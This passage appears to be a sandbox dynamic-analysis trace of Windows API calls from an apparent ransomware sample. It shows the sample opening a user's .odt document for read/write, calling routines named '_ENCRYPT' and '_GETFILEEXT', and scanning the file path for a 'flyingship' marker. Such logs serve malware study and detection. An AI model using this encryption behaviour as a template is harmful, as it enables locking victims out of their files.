(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0173.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0173.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.125] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.128] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0173.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9fa0 [0173.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9fa0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0173.129] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\us __ 9clmnku6a.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.130] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.130] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0173.130] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.130] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.131] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0173.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd828, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0173.131] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.132] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0173.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0173.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0173.132] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0173.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.132] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0173.132] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0173.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.132] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0173.132] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0173.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.132] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.132] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.132] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.132] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d462660, ftCreationTime.dwHighDateTime=0x1d5da18, ftLastAccessTime.dwLowDateTime=0x31badc20, ftLastAccessTime.dwHighDateTime=0x1d5e09b, ftLastWriteTime.dwLowDateTime=0x31badc20, ftLastWriteTime.dwHighDateTime=0x1d5e09b, nFileSizeHigh=0x0, nFileSizeLow=0xde49, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uS __ 9ClmNKU6A.odt", cAlternateFileName="US__9C~1.ODT")) returned 0x90add8 [0173.133] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.133] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d462660, ftCreationTime.dwHighDateTime=0x1d5da18, ftLastAccessTime.dwLowDateTime=0x31badc20, ftLastAccessTime.dwHighDateTime=0x1d5e09b, ftLastWriteTime.dwLowDateTime=0x31badc20, ftLastWriteTime.dwHighDateTime=0x1d5e09b, nFileSizeHigh=0x0, nFileSizeLow=0xde49, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uS __ 9ClmNKU6A.odt", cAlternateFileName="US__9C~1.ODT")) returned 0x90add8 [0173.134] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.134] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt\"", 